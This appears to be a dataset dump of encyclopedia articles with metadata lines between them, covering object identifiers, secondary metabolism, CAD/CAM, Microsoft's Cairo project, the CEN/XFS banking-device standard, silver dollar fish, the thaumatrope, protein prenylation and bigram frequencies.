In computing, object identifiers or OIDs are an identifier mechanism standardized by the International Telecommunication Union (ITU) and ISO/IEC for naming any object, concept, or "thing" with a globally unambiguous persistent name. Syntax and lexicon An OID corresponds to a node in the "OID tree" or hierarchy, which is formally defined using the ITU's OID standard, X.660. The root of the tree contains the following three arcs: 0: ITU-T 1: ISO 2: joint-iso-itu-t Each node in the tree is represented by a series of integers separated by periods, corresponding to the path from the root through the series of ancestor nodes, to the node. Thus, an OID denoting Intel Corporation appears as follows, 1.3.6.1.4.1.343 and corresponds to the following path through the OID tree: 1 ISO 1.3 identified-organization (ISO/IEC 6523), 1.3.6 DoD, 1.3.6.1 internet, 1.3.6.1.4 private, 1.3.6.1.4.1 IANA enterprise numbers, 1.3.6.1.4.1.343 Intel Corporation A textual representation of the OID paths is also commonly seen; for example, iso.identified-organization.dod.internet.private.enterprise.intel Each node in the tree is controlled by an assigning authority, which may define child nodes under the node and delegate assigning authority for the child nodes. Continuing with the example, the node numbers under root node "1" are assigned by ISO; the nodes under "1.3.6" are assigned by the US Department of Defense; the nodes under "1.3.6.1.4.1" are assigned by IANA; the nodes under "1.3.6.1.4.1.343" are assigned by Intel Corporation, and so forth. Usage ISO/IEC 6523 "International Code Designator" uses OIDs with the prefix "1.3". In computer security, OIDs serve to name almost every object type in X.509 certificates, such as components of Distinguished Names, CPSs, etc. Within X.500 and LDAP schemas and protocols, OIDs uniquely name each attribute type and object class, and other elements of schema. In Simple Network Management Protocol (SNMP), each node in a management information base (MIB) is identified by an OID. IANA assigns Private Enterprise Numbers (PEN) to companies and other organizations under the 1.3.6.1.4.1 node. OIDs down-tree from these are among the most commonly seen; for example, within SNMP MIBs, as LDAP attributes, and as vendor suboptions in the Dynamic Host Configuration Protocol (DHCP). In the United States, Health Level Seven (HL7), a standards-developing organization in the area of electronic health care data exchange, is the assigning authority at the 2.16.840.1.113883 (joint-iso-itu-t.country.us.organization.hl7) node. HL7 maintains its own OID registry, and as of December 1, 2020 it contained almost 20,000 nodes, most of them under the HL7 root. DICOM uses OIDs. The Centers for Disease Control and Prevention uses OIDs to manage the many complex values sets or "vocabularies" used in the Public Health Information Network (PHIN) Vocabulary Access and Distribution System (VADS). See also Digital object identifier Extended Validation Certificate International Geo Sample Number LSID Persistent Object Identifier Surrogate key Uniform Resource Name Universally Unique Identifier References External links Object Identifier Repository Global OID reference database Harald Tveit Alvestrand's Object Identifier Registry IANA Private Enterprise Numbers HL7 OID registry Obtaining an Object Identifier Identifiers Network management ASN.1
Object identifier
[ "Engineering" ]
851
[ "Computer networks engineering", "Network management" ]
1,064,129
https://en.wikipedia.org/wiki/Secondary%20metabolism
Secondary metabolism (also called specialized metabolism) is a term for pathways and small molecule products of metabolism that are involved in ecological interactions, but are not absolutely required for the survival of the organism. These molecules are sometimes produced by specialized cells, such as laticifers in plants. Secondary metabolites commonly mediate antagonistic interactions, such as competition and predation, as well as mutualistic ones such as pollination and resource mutualisms. Examples of secondary metabolites include antibiotics, pigments and scents. The opposite of secondary metabolites are primary metabolites, which are considered to be essential to the normal growth or development of an organism. Secondary metabolites are produced by many microbes, plants, fungi and animals, usually living in crowded habitats, where chemical defense represents a better option than physical escape. It is very hard to distinguish primary and secondary metabolites due to often overlapping of the intermediates and pathways of primary and secondary metabolism. As an example can serve sterols, that are products of secondary metabolism, and, at the same time, represent a base for a cell structure. Important secondary metabolites Antibiotics, such as streptomycin and penicillin Pigments, such as delphinidin Scents, such as ionone See also Plant secondary metabolism Phytochemistry Ophiocordyceps unilateralis References External links Secondary metabolism in plants Evolution of plant specialized metabolic pathways
Secondary metabolism
[ "Chemistry" ]
293
[ "Secondary metabolism", "Metabolism" ]
1,064,136
https://en.wikipedia.org/wiki/Observational%20equivalence
Observational equivalence is the property of two or more underlying entities being indistinguishable on the basis of their observable implications. Thus, for example, two scientific theories are observationally equivalent if all of their empirically testable predictions are identical, in which case empirical evidence cannot be used to distinguish which is closer to being correct; indeed, it may be that they are actually two different perspectives on one underlying theory. In econometrics, two parameter values (or two structures, from among a class of statistical models) are considered observationally equivalent if they both result in the same probability distribution of observable data. This term often arises in relation to the identification problem. In macroeconomics, it happens when you have multiple structural models, with different interpretation, but indistinguishable empirically. "the mapping between structural parameters and the objective function may not display a unique minimum." In the formal semantics of programming languages, two terms M and N are observationally equivalent if and only if, in all contexts C[...] where C[M] is a valid term, it is the case that C[N] is also a valid term with the same value. Thus it is not possible, within the system, to distinguish between the two terms. This definition can be made precise only with respect to a particular calculus, one that comes with its own specific definitions of term, context, and the value of a term. The notion is due to James H. Morris, who called it "extensional equivalence." See also Underdetermination References Statistical theory Econometric modeling Programming language semantics
Observational equivalence
[ "Technology" ]
335
[ "Computing stubs", "Computer science", "Computer science stubs" ]
1,064,179
https://en.wikipedia.org/wiki/CAD/CAM
CAD/CAM refers to the integration of computer-aided design (CAD) and computer-aided manufacturing (CAM). Both of these require powerful computers. CAD software helps designers and draftsmen; CAM "reduces manpower costs" in the manufacturing process. Overview Both CAD and CAM are computer-intensive. Although, in 1981, Computervision was #1 and IBM was #2, IBM had a major advantage: its systems could accommodate "eight to 20" users at a time, whereas most competitors only had enough power to accommodate "four to six." CAD/CAM was described by The New York Times as a "computerized design and manufacturing process" that made its debut "when Computervision pioneered it in the 1970's." Other 1980s major players in CAD/CAM included General Electric and Parametric Technology Corporation; the latter subsequently acquired Computervision, which had been acquired by Prime Computer. CAD/CAM originated in the 1960s; an IBM 360/44 was used to build via CNC the wings of an airplane. Computer-aided design (CAD) One goal of CAD is to allow quicker iterations in the design process; another is to enable smoothly transitioning to the CAM stage. Although manually created drawings historically facilitated "a designer's goal of displaying an idea," it did not result in a machine-readable result that could be modified and subsequently be used to directly build a prototype. It can also be used to "ensure that all the separate parts of a product will fit together as intended." CAD, when linked with simulation, can also enable bypassing building a less than satisfactory test version, resulting in having "dispensed with the costly, time-consuming task of building a prototype."<ref Computer-aided manufacturing (CAM) In Computer-aided manufacturing (CAM), using computerized specifications, a computer directs machines such as lathes and milling machines to perform work that otherwise would be controlled by a lathe or milling machine operator. This process, which is called Numerical Control (NC OR CNC), is what came to be known as 20th century Computer-aided manufacturing (CAM), and it originated in the 1960s. Early 21st century CAM introduced use of 3D printers. CAM, although it requires initial expenditures for equipment, covers this outlay with reduced labor cost and speedy transition from CAD to finished product, especially when the result is both timely and "ensuring one-time machining success rate." See also Computer-aided technologies CAD/CAM dentistry CAD/CAM in the footwear industry References Computer-aided design Computer-aided manufacturing Computer-aided engineering
CAD/CAM
[ "Engineering" ]
527
[ "Computer-aided design", "Design engineering", "Industrial engineering", "Computer-aided engineering", "Construction" ]
1,064,205
https://en.wikipedia.org/wiki/Cairo%20%28operating%20system%29
Cairo was the codename for a project at Microsoft from 1991 to 1996. Its charter was to build technologies for a next-generation operating system that would fulfill Bill Gates's vision of "information at your fingertips." Cairo never shipped, although portions of its technologies have since appeared in other products. Overview Cairo was announced at the 1991 Microsoft Professional Developers Conference by Jim Allchin. It was demonstrated publicly (including a demo system for all attendees to use) at the 1993 Cairo/Win95 PDC. Microsoft changed stance on Cairo several times, sometimes calling it a product, other times referring to it as a collection of technologies. Features Cairo used distributed computing concepts to make information available quickly and seamlessly across a worldwide network of computers. The Windows 95 user interface was based on the initial design work that was done on the Cairo user interface. DCE/RPC shipped in Windows NT 3.1. Content Indexing is now a part of Internet Information Server and Windows Desktop Search. The remaining component is the object file system. It was once planned to be implemented in the form of WinFS as part of Windows Vista but development was cancelled in June 2006, with some of its technologies merged into other Microsoft products such as Microsoft SQL Server 2008, also known under the codename "Katmai". See also History of Microsoft Windows List of Microsoft codenames References Notes Distributed operating systems Microsoft Windows Microsoft operating systems Object-oriented operating systems Uncompleted Microsoft initiatives
Cairo (operating system)
[ "Technology" ]
297
[ "Computing platforms", "Microsoft Windows" ]
1,064,223
https://en.wikipedia.org/wiki/CEN/XFS
CEN/XFS or XFS (extensions for financial services) provides a client-server architecture for financial applications on the Microsoft Windows platform, especially peripheral devices such as EFTPOS terminals and ATMs which are unique to the financial industry. It is an international standard promoted by the European Committee for Standardization (known by the acronym CEN, hence CEN/XFS). The standard is based on the WOSA Extensions for Financial Services or WOSA/XFS developed by Microsoft. With the move to a more standardized software base, financial institutions have been increasingly interested in the ability to pick and choose the application programs that drive their equipment. XFS provides a common API for accessing and manipulating various financial services devices regardless of the manufacturer. History Chronology: 1991 - Microsoft forms "Banking Solutions Vendor Council" 1995 - WOSA/XFS 1.11 released 1997 - WOSA/XFS 2.0 released - additional support for 24 hours-a-day unattended operation 1998 - adopted by European Committee for Standardization as an international standard. 2000 - XFS 3.0 released by CEN 2008 - XFS 3.10 released by CEN 2011 - XFS 3.20 released by CEN 2015 - XFS 3.30 released by CEN 2020 - XFS 3.40 released by CEN 2022 - XFS 3.50 released by CEN WOSA/XFS changed name to simply XFS when the standard was adopted by the international CEN/ISSS standards body. However, it is most commonly called CEN/XFS by the industry participants. XFS middleware While the perceived benefit of XFS is similar to Java's "write once, run anywhere" mantra, often different hardware vendors have different interpretations of the XFS standard. The result of these differences in interpretation means that applications typically use a middleware to even out the differences between various platforms implementation of XFS. Notable XFS middleware platforms include: F1 Solutions - F1 TPS (multi-vendor ATM & POS solution) Serquo - Dwide (REST API middleware for XFS) Nexus Software LLC - Nexus Evolution Nautilus Hyosung - Nextware Cyttek Gen3XFS - Multivendor terminal solution for ATM Hitachi-Omron Terminal Solutions ATOM Diebold Agilis Power NCR - NCR XFS KAL - KAL Kalignite Auriga - The Banking E-volution- WWS Omnichannel Platform Phoenix Interactive VISTAatm Acquired by Diebold Wincor Nixdorf ProBase (ProBase C as WOSA/XFS platform - ProBase J as J/XFS platform) SBS Software KIXXtension Dynasty Technology Group - (JSI) Jam Service Interface HST Systems & Technologies - HAL Interface FreeXFS- open source XFS platform GRG banking eCAT (multi-vendor ATM terminal solution) TIS xfs.js implementation(open source for node.js community) TEB Orion XFS test tools XFS test tools allow testing of XFS applications and middleware on simulated hardware. Some tools include sophisticated automatic regression testing capabilities. Providers of XFS test tools include: Cyttek Group - XFS Middleware Abbrevia Simplicity Paragon VirtualATM Product Page ATM Testing FIS ATM TestLab, Open Test Solutions, Product Brochure (was Clear2Pay, formerly Level Four Software and Lexcel TestSystem ATM) Serquo XFS ATM Simulator Atmirage KAL KAL Kalignite Test Utilities Dynasty Technology Group - JSI Simulators HST Systems & Technologies (Brazil) Takkto Technologies (Mexico) LUTZWOLF JDST - Testtool for J/XFS compatibility Afferent Software RapidFire ATM XFS J/XFS J/XFS is an alternative API to CEN/XFS (which is Windows specific) and also to Xpeak (which is Operating System independent, based on XML messages). J/XFS is written in Java with the objective to provide a platform agnostic client-server architecture for financial applications, especially peripheral devices used in the financial industry such as EFTPOS terminals and ATMs. With the move to a more standardized software base, financial institutions have been increasingly interested in the ability to pick and choose the application programs that drive their equipment. J/XFS provides a common Object Oriented API between a pure Java application and a wide range of financial devices, providing a layer of separation between application and device logic that can be implemented using a native J/XFS API or wrapping an existing implementation in JavaPOS or CEN/XFS. J/XFS was developed by the companies De La Rue, IBM, NCR, Wincor Nixdorf and Sun Microsystems and is now hosted, monitored and maintained by the European Committee for Standardization, CEN. See also Xpeak - Devices Connectivity using XML (Open Source Project). Automated teller machine Teller assist unit References External links CEN/XFS Home Page Windows communication and services Device drivers Embedded systems Application programming interfaces Microsoft application programming interfaces Banking technology
CEN/XFS
[ "Technology", "Engineering" ]
1,041
[ "Embedded systems", "Computer science", "Computer engineering", "Computer systems" ]
1,064,325
https://en.wikipedia.org/wiki/Silver%20dollar%20%28fish%29
Silver dollar is a common name given to a number of species of fishes, mostly in the genus Metynnis, tropical fish belonging to the family Serrasalmidae which are closely related to piranha and pacu. Most commonly, the name refers to Metynnis argenteus. Native to South America, these somewhat round-shaped silver fish are popular with fish-keeping hobbyists. The silver dollar is a peaceful schooling species that spends most of its time in the mid- to upper-level of the water. Its average lifespan is less than ten years but can live longer in captivity. A benthic spawner and egg scatterer, the adult fish will spawn around 2,000 eggs. This breeding occurs in soft, warm water in low light. Silver dollars natively live in a tropical climate in the sides of weedy rivers. They prefer water with a pH of 5–7, a water hardness of up to 15 dGH, and an ideal temperature range of 24–28 °C (75–82 °F). Their diet is almost exclusively vegetarian and in captivity they will often eat all the plants in a tank. They will also eat worms and small insects. Fish compatibility The silver dollar is listed as semi-aggressive but some silver dollars can be very mellow. These fish can be kept in community tanks with fish that can't fit in their mouths, and once fully grown, they can be kept with larger fish like oscars, pikes, and larger catfish. Breeding The best way to acquire a breeding pair is to purchase a half dozen juvenile silver dollars and raise them together. The parents will not consume the eggs or fry, although other fish will, so when spawning them it is wise to place them in a separate tank. To facilitate spawning, make sure the water is soft (8 dgH or below) and warm (80 to 82 F), keep the lighting dim, and provide fine-leaved plants. Eventually a pair will spawn, and the female will lay up to 2000 eggs. The eggs will fall to the bottom of the tank, where they will hatch in three days. After approximately a week, the fry will be free swimming and able to eat fine foods such as commercially prepared fry food, finely-crushed spirulina, or freshly-hatched brine shrimp. Silver dollar species Metynnis altidorsalis Metynnis argenteus (Silver dollar) Metynnis fasciatus (Striped silver dollar) Metynnis guaporensis Metynnis hypsauchen (Schreitmüller's silver dollar, Striped silver dollar) Metynnis lippincottianus (Spotted silver dollar) Metynnis luna (Red-spot silver dollar) Metynnis maculatus (Speckled silver dollar) Metynnis mola Metynnis otuquensis Myloplus rubripinnis (Red hook silver dollar) Myloplus schomburgkii (Black-barred silver dollar) Mylossoma duriventre (Silver mylossoma (Hard-bellied silver dollar) Hard bellies are silvery and somewhat transparent; they are the most commonly encountered species. See also List of freshwater aquarium fish species References Serrasalmidae Fish common names Paraphyletic groups
Silver dollar (fish)
[ "Biology" ]
668
[ "Phylogenetics", "Paraphyletic groups" ]
1,064,372
https://en.wikipedia.org/wiki/Thaumatrope
A thaumatrope is an optical toy that was popular in the 19th century. A disk with a picture on each side is attached to two pieces of string. When the strings are twirled quickly between the fingers the two pictures appear to blend into one. The toy has traditionally been thought to demonstrate the principle of persistence of vision, a disputed explanation for the cause of illusory motion in stroboscopic animation and film. Examples of common thaumatrope pictures include a bare tree on one side of the disk, and its leaves on the other, or a bird on one side and a cage on the other. Many classic thaumatropes also included riddles or short poems, with one line on each side. Thaumatropes can provide an illusion of motion with the two sides of the disc each depicting a different phase of the motion, but no examples are known to have been produced until long after the introduction of the first widespread animation device: the phenakistiscope Thaumatropes are often seen as important antecedents of motion pictures and in particular of animation. The name translates roughly as "wonder turner", from "wonder" and τρόπος "turn". Invention A 2012 paper argues that a prehistoric bone disk found in the Laugerie-Basse rockshelter is a thaumatrope, designed to be spun using leather thongs threaded through the central perforation. The invention of the thaumatrope is usually credited to British physician John Ayrton Paris. He described the device in his 1827 educational book for children Philosophy in Sport Made Science in Earnest, with an illustration by George Cruikshank. British mathematician Charles Babbage recalled in 1864 that the thaumatrope was invented by the geologist William Henry Fitton. Babbage had told Fitton how the astronomer John Herschel had challenged him to show both sides of a shilling at once. Babbage held the coin in front of a mirror, but Herschel showed how both sides were visible when the coin was spun on the table. A few days later Fitton brought Babbage a new illustration of the principle, consisting of a round disc of card suspended between two pieces of sewing silk. This disc had a parrot on one side and a cage at the other side. Babbage and Fitton made several different designs and amused some friends with them for a short while. They forgot about it until some months later they heard about the "wonderful invention of Dr. Paris". French artist Antoine Claudet stated in 1867 that he had heard that Paris had once been present when Herschel demonstrated his rotating coin trick to his children and subsequently got the idea for the thaumatrope. Claudet also noted in 1867 that the thaumatrope could create a three-dimensional illusion. A spinning rectangular thaumatrope with the alternating letters of the name "Victoria" on each side, showed the full word with the letters at two different distances from the observer's eye. If the two strings of the thaumatrope are attached to the same side of the card the thickness of the card accounts for a small difference in the distances when each side is visible. Commercial production The first commercial thaumatrope was registered at Stationers' Hall on 2 April 1825 and published by W. Phillips in London as The Thaumatrope; being Rounds of Amusement or How to Please and Surprise By Turns, sold in boxes of 12 or 18 discs. It included a sheet with mottoes or riddles for each disc, often with a political meaning. Paris was widely regarded as the author, but wasn't mentioned on the product or its packaging and he later claimed in a letter to Michael Faraday "I was first induced to publish it, at the earnest desire of my late friend Wm Phillips. (...) I may add that I never put my name to it". The steep price of a set (seven shilling for 12 discs or half a guinea for 18) was criticized, half a guinea would have been about a week's pay for an average worker. It was also defended: its inventor should be able to earn something from his invention while it was new, before it was widely copied as seen before with the kaleidoscope. Paris later claimed he gained £150,- from its sales in the United Kingdom. As expected, pirate copies soon became common and were much cheaper. For instance the 'Thaumatropical Amusement' was available in boxes of six discs for one shilling. Although the toy became very popular, original copies are now very rare; only one extant set produced by W. Phillips is currently known (in the Richard Balzer collection) and one single disc is at the Cinématheque Française. Other early publishers across the continent included Alphonse Giroux & Compagnie in France and Trentsensky in Austria. In 1833 these companies would be the very first publishers of the next big "philosophical toy" craze: the Phénakisticope. Animation In the first 1827 edition of "Philosophy in Sport" John Ayrton Paris described a version with a circular frame around the disc through which the strings were threaded. A little tug on the strings would cause a minor change in the axis of rotation and thus a slight shift in the position of the images while revolving. An adapted version of the standard horse and jockey thaumatrope could thus first show the jockey on the horse before being thrown over its head. In a new 1833 edition of the book this example was replaced with a version without a ring but with an elastic string added to change the axis by pulling it. This version showed a drinking man lowering and raising a bottle to and from his mouth, with an illustration of the different sides of the disc and the different states of the resulting image. Several other examples were described in the book. The balls of a juggler could appear as in motion and the two painted balls could be seen as three or four when the axis of rotation was shifted. A tailor in a pulpit next to a pond with a goose fluttering in the water would have the tailor falling into the water and the goose taking his place in the pulpit. No commercially produced versions with these techniques are known. On 26 November 1869 the Rev. Richard Pilkington received "Useful Registered Design Number 5074" for his Pedemascope. This was a variation of the thaumatrope. It had a card with pictures "painted in two different positions on both sides". This card was placed in the two-part mahogany holder with a handle and a brass pin that would semi-rotate the card when it was twirled (a bit of iron preventing full rotation). Transparent or cut-out variations were suggested for use with the magic lantern. In 1892 mechanical engineer Thomas E. Bickle received British Patent No. 20,281 for a clockwork thaumatrope with "pictures or designs exhibiting some action or motion in two phases, which are thus alternately presented to the eye in rapid succession with small intervals of rest". Thaumatropes in popular culture The 1827 book Philosophy in Sport made Science in Earnest, being an attempt to illustrate the first principles of natural philosophy by the aid of popular toys and sports featured the thaumatrope and warned against inferior copies. The chapter head was illustrated with a drawing by George Cruikshank, depicting a man demonstrating the thaumatrope to a girl and a boy. It was first published anonymously, but posthumous editions were credited to John Ayrton Paris. In the 1999 Tim Burton film Sleepy Hollow, a bird and cage thaumatrope is demonstrated by Johnny Depp's character. In the 2006 Christopher Nolan film The Prestige, Michael Caine's character repeatedly uses a thaumatrope as a way of explaining persistence of vision. In the 2011 Martin Scorsese film Hugo, the final scene begins in the middle of a conversation about cinema precursors, including the thaumatrope. In the 2013 video game BioShock Infinite the bird and the cage thaumatrope is used several times. In the 2022 film The Wonder, a thaumatrope is featured frequently throughout the film. In the 2023 film Gaslight, a thaumatrope is used. See also Strobe light References External links A collection of animated thaumatropes – The Richard Balzer Collection leads to the gambling site Demonstration BBC Film Network – The Persistent Resistance of Vision – short film parodying the thaumatrope demonstration of an antique/early thaumatrope Audiovisual introductions in 1824 Animation techniques History of animation Optical illusions Novelty items Optical toys
Thaumatrope
[ "Physics" ]
1,762
[ "Optical phenomena", "Physical phenomena", "Optical illusions" ]
1,064,373
https://en.wikipedia.org/wiki/Prenylation
Prenylation (also known as isoprenylation or lipidation) is the addition of hydrophobic molecules to a protein or a biomolecule. It is usually assumed that prenyl groups (3-methylbut-2-en-1-yl) facilitate attachment to cell membranes, similar to lipid anchors like the GPI anchor, though direct evidence of this has not been observed. Prenyl groups (also called isoprenyl groups, having one hydrogen atom more than isoprene) have been shown to be important for protein–protein binding through specialized prenyl-binding domains. Protein prenylation Protein prenylation involves the transfer of either a farnesyl or a geranylgeranyl moiety to C-terminal cysteine(s) of the target protein. There are three enzymes that carry out prenylation in the cell, farnesyl transferase, Caax protease and geranylgeranyl transferase I. Farnesylation is a type of prenylation, a post-translational modification of proteins by which an isoprenyl group is added to a cysteine residue. It is an important process to mediate protein–protein interactions and protein–membrane interactions. Prenylation sites There are at least 3 types of sites that are recognized by prenylation enzymes. The CaaX motif is found at the COOH-terminus of proteins, such as lamins or Ras. The motif consists of a cysteine (C), two aliphatic amino acids ("aa") and some other terminal amino acid ("X"). If the X position is serine, alanine, or methionine, the protein is farnesylated. For instance, in rhodopsin kinase the sequence is CVLS. If X is leucine, the protein is geranylgeranylated. The second motif for prenylation is CXC, which, in the Ras-related protein Rab3A, leads to geranylgeranylation on both cysteine residues and methyl esterification. The third motif, CC, is also found in Rab proteins, where it appears to direct only geranylgeranylation but not carboxyl methylation. Carboxyl methylation only occurs on prenylated proteins. Farnesyltransferase and geranylgeranyltransferase I Farnesyltransferase and geranylgeranyltransferase I are very similar proteins. They consist of two subunits, the α-subunit, which is common to both enzymes, and the β-subunit, whose sequence identity is just 25%. These enzymes recognise the CaaX box at the C-terminus of the target protein. C is the cysteine that is prenylated, a is any aliphatic amino acid, and the identity of X determines which enzyme acts on the protein. Farnesyltransferase recognizes CaaX boxes where X = M, S, Q, A, or C, whereas geranylgeranyltransferase I recognizes CaaX boxes with X = L or E. Rab geranylgeranyl transferase Rab geranylgeranyltransferase, or geranylgeranyltransferase II, transfers (usually) two geranylgeranyl groups to the cysteine(s) at the C-terminus of Rab proteins. The C-terminus of Rab proteins varies in length and sequence and is referred to as hypervariable. Thus Rab proteins do not have a consensus sequence, such as the CAAX box, which the Rab geranylgeranyl transferase can recognize. The Rab proteins usually terminate in a CC or CXC motif. Instead, Rab proteins are bound by the Rab escort protein (REP) over a more conserved region of the Rab protein and then presented to the Rab geranylgeranyltransferase. Once Rab proteins are prenylated, the lipid anchor(s) ensure that Rabs are no longer soluble. REP, therefore, plays an important role in binding and solubilising the geranylgeranyl groups and delivers the Rab protein to the relevant cell membrane. Substrates Both isoprenoid chains, geranylgeranyl pyrophosphate (GGpp) and farnesyl pyrophosphate are products of the HMG-CoA reductase pathway. The product of HMG CoA reductase is mevalonate. By combining precursors with 5 carbons, the pathway subsequently produces geranyl pyrophosphate (10 carbons), farnesyl pyrophosphate (15 carbons) and geranylgeranyl pyrophosphate (20 carbons). Two farnesyl pyrophosphate groups can also be combined to form squalene, the precursor for cholesterol. This means that statins, which inhibit HMG CoA reductase, inhibit the production of both cholesterol and isoprenoids. Note that, in the HMG-CoA reductase/mevalonate pathway, the precursors already contain a pyrophosphate group, and isoprenoids are produced with a pyrophosphate group. There is no known enzyme activity that can carry out the prenylation reaction with the isoprenoid alcohol. However, enzymatic activity for isoprenoid kinases capable converting isoprenoid alcohols to isoprenoid pyrophosphates have been shown. In accordance with this, farnesol and geranylgeraniol have been shown to be able to rescue effects caused by statins or nitrogenous bisphosphonates, further supporting that alcohols can be involved in prenylation, likely via phosphorylation to the corresponding isoprenoid pyrophosphate. Proteins that undergo prenylation include Ras, which plays a central role in the development of cancer. This suggests that inhibitors of prenylation enzymes (e.g., farnesyltransferase) may influence tumor growth. In the case of the K- and N-Ras forms of Ras, when cells are treated with FTIs, these forms of Ras can undergo alternate prenylation in the form of geranylgeranylation. Recent work has shown that farnesyltransferase inhibitors (FTIs) also inhibit Rab geranylgeranyltransferase and that the success of such inhibitors in clinical trials may be as much due to effects on Rab prenylation as on Ras prenylation. Inhibitors of prenyltransferase enzymes display different specificity for the prenyltransferases, dependent upon the specific compound being utilized. In addition to GTPases, the protein kinase GRK1 also known as rhodopsin kinase (RK) has been shown to undergo farnesylation and carboxyl methylation directed by the carboxyl terminal CVLS CaaX box sequence of the protein. The functional consequence of these post-translational modifications have been shown to play a role in regulating the light-dependent phosphorylation of rhodopsin, a mechanism involved in light adaptation. Inhibitors FTIs can also be used to inhibit farnesylation in parasites such as Trypanosoma brucei and malaria. Parasites seem to be more vulnerable to inhibition of farnesyltransferase than humans are. In some cases, this may be because they lack geranylgeranyltransferase I. Thus, it may be possible for the development of antiparasitic drugs to 'piggyback' on the development of FTIs for cancer research. In addition, FTIs have shown some promise in treating a mouse model of progeria, and in May 2007 a phase II clinical trial using the FTI lonafarnib was started for children with progeria. In signal transduction via G protein, palmitoylation of the α subunit, prenylation of the γ subunit, and myristoylation is involved in tethering the G protein to the inner surface of the plasma membrane so that the G protein can interact with its receptor. Prenylation of small molecules Small molecules can also undergo prenylation, such as in the case of prenylflavonoids and other meroterpenoids. Prenylation of a vitamin B2 derivative (flavin mononucleotide) was recently described. Longevity and cardiac effects A 2012 study found that statin treatment increases lifespan and improves cardiac health in Drosophila by decreasing specific protein prenylation. The study concluded, "These data are the most direct evidence to date that decreased protein prenylation can increase cardiac health and lifespan in any metazoan species, and may explain the pleiotropic (non-cholesterol related) health effects of statins." A 2012 clinical trial explored the approach of inhibiting protein prenylation with some degree of success in the treatment of Hutchinson–Gilford progeria syndrome, a multisystem disorder which causes failure to thrive and accelerated atherosclerosis leading to early death. See also Myristoylation Palmitoylation Choroideremia, a genetic disease caused by the loss of REP1, REP2 almost compensates, but cannot rescue the slow onset of blindness References Further reading External links Peripheral membrane proteins Membrane biology Post-translational modification
Prenylation
[ "Chemistry" ]
1,998
[ "Membrane biology", "Gene expression", "Biochemical reactions", "Post-translational modification", "Molecular biology" ]
1,064,401
https://en.wikipedia.org/wiki/Hypercolor
Hypercolor was a line of clothing, mainly T-shirts and shorts, that changed color with heat. They were manufactured by Generra Sportswear Company of Seattle and marketed in the United States as Generra Hypercolor or Generra Hypergrafix and elsewhere as Global Hypercolor. They contained a thermochromic pigment made by Matsui Shikiso Chemical of Japan, that changed between two colors—one when cold, one when warm. The shirts were produced with several color change choices beginning in 1991. The effect could easily be permanently damaged, particularly when the clothing was washed in hotter than recommended water, ironed, bleached, or tumble-dried. Generra Sportswear Co. had originally been founded as a men's sportswear distributor and importer in Seattle in 1980. The company was sold to Texas-based Farah Manufacturing Co. in 1984 and bought back by its founders in 1989. In 1986, the company added childrenswear and womenswear items to their portfolio. They struggled to meet the overwhelming demand for Hypercolor products. Between February and May 1991 they sold $50 million in Hypercolor garments. Generra went bankrupt due to mismanagement and fading demand in 1992. The Hypercolor business for the U.S. market was sold to The Seattle T-shirt Company in 1993; Generra kept the rights for the international market. The company emerged from bankruptcy in 1995 as a licensing business. The Generra name was acquired by Public Clothing Co. of New York in 2002. Today, Generra Co. is a contemporary women's and men's apparel brand headquartered in New York City. In the early 2000s, the technique was revived by a number of apparel brands. In mid-2020, the color-changing clothing trend was revived yet again by several online retailers selling color-changing swim trunks. Principle Substances that can change color due to a change in temperature are called thermochromes. There are two common types of thermochromes: liquid crystals (used in mood rings) and leuco dyes (used in Hypercolor T-shirts). The color change of Hypercolor shirts is based on combination of two colors: the color of the dyed fabric, which remained constant, and the color of the thermochromic dye. Droplets of the thermochromic dye mixture are enclosed in transparent microcapsules, a few micrometers in diameter, bound to the fibers of the fabric. The thermochromic droplets are actually a mixture of several chemicals—crystal violet lactone (the color-changing dye itself), benzotriazole (a weak acid), and a quaternary ammonium salt of a fatty acid (myristylammonium oleate) dissolved in 1-dodecanol as solvent. Together, these lead to a reversible chemical reaction in response to temperature change that produces a change of color. At low temperatures, the mixture is a solid. The weak acid forms a colored complex with the leuco dye by causing the lactone ring in the center of the dye molecule to open. At high temperatures, above , the solvent melts and the ammonium salt dissociates, allowing it to react with the weak acid. This reaction increases the pH, which leads to closing of the lactone ring of the dye to convert it to its colorless (leuco) form. Therefore, at the low temperature the color of the shirt is the combination of the color of the encapsulated colored dye with the color of the dyed fabric, while at higher temperatures the capsules become colorless and the color of the fabric prevails. References External links Clothing brands 1990s fashion Thermochromism Color of clothing
Hypercolor
[ "Materials_science" ]
767
[ "Smart materials", "Chromism", "Thermochromism" ]
1,064,587
https://en.wikipedia.org/wiki/Bigram
A bigram or digram is a sequence of two adjacent elements from a string of tokens, which are typically letters, syllables, or words. A bigram is an n-gram for n=2. The frequency distribution of every bigram in a string is commonly used for simple statistical analysis of text in many applications, including in computational linguistics, cryptography, and speech recognition. Gappy bigrams or skipping bigrams are word pairs which allow gaps (perhaps avoiding connecting words, or allowing some simulation of dependencies, as in a dependency grammar). Applications Bigrams, along with other n-grams, are used in most successful language models for speech recognition. Bigram frequency attacks can be used in cryptography to solve cryptograms. See frequency analysis. Bigram frequency is one approach to statistical language identification. Some activities in logology or recreational linguistics involve bigrams. These include attempts to find English words beginning with every possible bigram, or words containing a string of repeated bigrams, such as logogogue. Bigram frequency in the English language The frequency of the most common letter bigrams in a large English corpus is: th 3.56% of 1.17% io 0.83% he 3.07% ed 1.17% le 0.83% in 2.43% is 1.13% ve 0.83% er 2.05% it 1.12% co 0.79% an 1.99% al 1.09% me 0.79% re 1.85% ar 1.07% de 0.76% on 1.76% st 1.05% hi 0.76% at 1.49% to 1.05% ri 0.73% en 1.45% nt 1.04% ro 0.73% nd 1.35% ng 0.95% ic 0.70% ti 1.34% se 0.93% ne 0.69% es 1.34% ha 0.93% ea 0.69% or 1.28% as 0.87% ra 0.69% te 1.20% ou 0.87% ce 0.65% See also Digraph (orthography) Letter frequency Sørensen–Dice coefficient References Formal languages Classical cryptography Natural language processing
Bigram
[ "Mathematics", "Technology" ]
478
[ "Natural language processing", "Formal languages", "Mathematical logic", "Natural language and computing" ]
1,064,603
https://en.wikipedia.org/wiki/Ancient%20woodland
